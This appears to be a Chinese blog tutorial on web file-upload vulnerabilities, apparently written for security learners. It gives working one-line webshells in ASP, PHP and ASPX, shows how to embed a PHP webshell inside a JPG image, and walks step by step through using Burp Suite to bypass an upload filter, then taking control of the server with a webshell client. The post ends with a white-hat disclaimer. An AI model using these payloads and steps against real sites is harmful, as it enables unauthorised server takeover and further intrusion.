简介
这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。
导致该漏洞的原因在于代码作者没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。
一句话木马
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用
常见写法:
- asp 一句话木马:
<%eval request("Fangdm")%> - php 一句话木马:
<?php @eval($_POST[value]);?> - aspx 一句话木马:
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
制作一句话:
-
C32下制作一句话
1.将图片拖入C32中,选择十六进制-->确定 如图所示:
image.png
2.在末尾加入一句话(以PHP为例),保存即可:
image.png
- Cmd 制作一句话
-
打开Cmd 切换到存放一句话的目录下
image.png -
执行命令制作一句话木马图片
语法:
C:\Users\Administrator\Desktop\一句话>copy x.jpg /b + hacker.php /a y.jpg
用记事本打开图片,发现一句话写入了图片编码中:
image.png一句话制作好直接上传,然后利用解析漏洞就能拿Shell 了。
实验
实验目的:
利用Burpsuite 完美绕过文件上传格式限制拿Shell
实验场景:
上传脚本文件时被拦截
-
如图:
image.png
Step1:打开浏览器代理,打开Burpsuite
image.png
image.png
Step2:准备好要上传的脚本文件
image.png
Step3:在Burpsuite中开启抓包,并点击上传文件
image.png
Step4:Ctrl+R 转入Repeater
模块对抓到的包进行处理,由于这里只允许我们上传jpeg 、png 格式文件,所有我们只需要将我们上传的文件类型改掉,如图所示
Step5:点击Go 进行上传,发现我们已经完美绕过限制,并得到了路径
image.png
Step6:根据得到了路径在浏览器访问,发现我们可以访问,那么复制链接直接上菜刀
image.png
Step7:拿到服务器,接下来我们就可以直接传大马等。
image.png注:《白帽子讲Web安全》中有一句话:互联网本来是安全的,自从有了研究安全的人之后,互联网就变得不安全了。
所以,小编希望大家都是白帽子,而不是一群只会搞恶作剧的骇客。
小编也在学习,写的不好见谅。
从0到1学习网络安全 【目录】
小编最近建了交流群方便大家交流学习,群内有小编平时整理的学习资料、视频、工具等。
白帽交流群 【简介】
感谢大家支持。
网友评论